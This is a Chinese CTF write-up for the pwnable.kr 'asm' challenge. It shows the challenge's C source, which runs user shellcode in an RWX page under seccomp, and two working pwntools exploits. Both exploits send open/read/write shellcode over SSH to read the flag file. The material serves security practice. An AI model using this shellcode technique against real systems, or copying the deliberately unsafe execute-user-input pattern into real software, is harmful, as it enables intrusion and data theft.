【pwnable】asm之write up
首先查看源代码:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>

#define LENGTH 128  /* NOTE(review): not referenced anywhere in this listing */

/*
 * Install the seccomp filter the user-supplied shellcode will run under.
 *
 * The default action is SCMP_ACT_KILL, so every syscall that is not
 * explicitly allowed below terminates the process. Only
 * open/read/write/exit/exit_group are allowed, and each rule is added
 * with an argument count of 0, i.e. no argument filtering: open() may be
 * called on any path and write() on any fd.
 *
 * NOTE(review): the return values of the seccomp_rule_add() calls are not
 * checked. A rule that failed to install would leave that syscall on the
 * KILL default (the safe direction), but the failure would be silent.
 */
void sandbox(){
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);
    if (ctx == NULL) {
        printf("seccomp error\n");
        exit(0);
    }
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);
    if (seccomp_load(ctx) < 0){
        seccomp_release(ctx);
        printf("seccomp error\n");
        exit(0);
    }
    seccomp_release(ctx);
}

/*
 * Prologue placed in front of the user's shellcode. The bytes decode as
 * `xor reg, reg` for rax, rbx, rcx, rdx, rsi, rdi, rbp and r8..r15 (rsp is
 * left alone), so the shellcode starts with every general-purpose register
 * zeroed. The string contains no 0x00 byte, so strlen(stub) covers all of
 * it (see the memcpy in main).
 */
char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";

unsigned char filter[256];  /* NOTE(review): declared but never used in this listing */

/*
 * Challenge entry point: map an RWX page at a fixed address, copy the
 * register-zeroing stub into it, append up to 1000 bytes of caller-supplied
 * shellcode, then chroot, install the seccomp sandbox and jump to the page.
 */
int main(int argc, char* argv[]){
    /* stdout unbuffered so the prompt (no trailing newline) reaches the client;
       stdin line-buffered. */
    setvbuf(stdout, 0, _IONBF, 0);
    setvbuf(stdin, 0, _IOLBF, 0);

    printf("Welcome to shellcoding practice challenge.\n");
    printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");
    printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");
    printf("If this does not challenge you. you should play 'asg' challenge :)\n");

    /* One 0x1000-byte page at the fixed address 0x41414000 with prot 7 =
       PROT_READ|PROT_WRITE|PROT_EXEC (writable and executable at once).
       NOTE(review): the result is not compared against MAP_FAILED before it
       is passed to memset(); the integer literal is also passed where a
       `void *` is expected without a cast. */
    char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);

    /* Fill the whole page with 0x90 (NOP) so execution that runs past the
       shellcode slides through NOPs to the end of the page. */
    memset(sh, 0x90, 0x1000);

    /* Copy the stub (strlen == 45 bytes, no embedded NUL). offset is
       sizeof(stub) == 46, i.e. one byte past the copied bytes, so a single
       NOP separates the stub from the user shellcode. */
    memcpy(sh, stub, strlen(stub));
    int offset = sizeof(stub);

    printf("give me your x64 shellcode: ");
    /* Up to 1000 bytes at page offset 46 — stays inside the 0x1000 page.
       NOTE(review): the return value is ignored; on a short or zero-length
       read the NOP-filled page is executed anyway. */
    read(0, sh+offset, 1000);

    /* NOTE(review): the 10 s timer is armed only after read() returns, so a
       client that connects and never sends anything holds the process open
       indefinitely. */
    alarm(10);

    /* NOTE(review): return value unchecked, and no chdir("/") follows.
       chroot() does not change the working directory, so the cwd stays
       wherever the service was started; the exploits below open the flag by
       a relative path, which presumably relies on that cwd being the flag's
       directory — confirm against the service setup. */
    chroot("/home/asm_pwn"); // you are in chroot jail. so you can't use symlink in /tmp

    /* Filter is installed after read()/alarm()/chroot(), so only the
       shellcode itself runs under seccomp. */
    sandbox();

    /* Jump to the stub; control never returns here in practice. */
    ((void (*)(void))sh)();
    return 0;
}
题目中给出了提示:
题目提示:asm 正在本地 9026 端口上运行,连接上去提交 shellcode 即可读到 flag;flag 所在文件名为:
this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong
所以exp如下:
from pwn import *

# Hand-written exploit: raw x64 shellcode that takes the flag path from
# stdin, opens it, reads it and writes it back. Run under Python 2
# (str payloads, .decode('hex')).
context(arch='amd64', log_level='debug')

FLAG_NAME = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong'

# The shellcode is placed at 0x41414000 + 46 inside a page pre-filled with
# 0x90 (NOP) bytes; it uses two scratch buffers further down in that page.
# Immediates are built with mov/xor so no 0x00 bytes appear in the payload.
SHELLCODE_HEX = (
    # read(0, 0x41414700, 0x100): receive the NUL-terminated flag path
    '31c031ff31d2b601be0101010181f6014640400f05'
    # open(0x41414700, O_RDONLY, 0x400): push 2; pop rax -> SYS_open
    '6a0258bf0101010181f70146404031d2b60431f60f05'
    # read(fd, 0x41414800, 0x200): mov rdi, rax carries the fd over
    '4889c731c031d2b602be0101010181f6014940400f05'
    # write(1, 0x41414800, 0x300): spills into the 0x90 page filler after the flag
    '6a01586a015f31d2b603be0101010181f6014940400f05'
)

con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
p = con.connect_remote('localhost', 9026)

p.recvuntil('shellcode: ')
p.send(SHELLCODE_HEX.decode('hex'))
# The page is NOP-filled, so the path needs its own terminator.
p.send(FLAG_NAME + '\x00')
# The write() above covers 0x300 bytes; the flag ends where the 0x90 filler begins.
print(p.recvuntil('\x90'))
得到结果如下:
附:
exp:
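from pwn import *

# pwntools shellcraft version of the exploit: open()/read()/write() only,
# plus exit(), all of which the challenge's seccomp allow-list permits.
FLAG_NAME = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong'
READ_LEN = 100  # bytes of the flag file to read; rsp points at scratch space after open()

con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
p = con.connect_remote('localhost', 9026)

context(arch='amd64', os='linux')

shellcode = ''
# NUL-terminated path on the stack; rsp now points at it.
shellcode += shellcraft.pushstr(FLAG_NAME)
# open(path, O_RDONLY, 0) -> fd in rax.
shellcode += shellcraft.open('rsp', 0, 0)
# read(fd, rsp, READ_LEN) -> number of bytes read in rax; overwrites the
# path, which is no longer needed.
shellcode += shellcraft.read('rax', 'rsp', READ_LEN)
# Write exactly the bytes that were read (rax) instead of a fixed 100,
# so no stale stack bytes are echoed if the file is shorter.
shellcode += shellcraft.write(1, 'rsp', 'rax')
# Terminate cleanly; without this, execution falls off the end of the
# shellcode into the NOP-filled page. exit is allowed by the sandbox.
shellcode += shellcraft.exit(0)

print(shellcode)
print(p.recv())
p.send(asm(shellcode))
# exit(0) closes the connection, so recvall() returns the whole flag without
# depending on a trailing newline.
print(p.recvall())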
1.先用open()打开flag文件,拿到文件描述符;2.再用read()把文件内容读到缓冲区
3.最后用write()把缓冲区内容写到标准输出(fd 1),flag 随连接回显到本地
转载于:https://www.cnblogs.com/liuyimin/p/7496363.html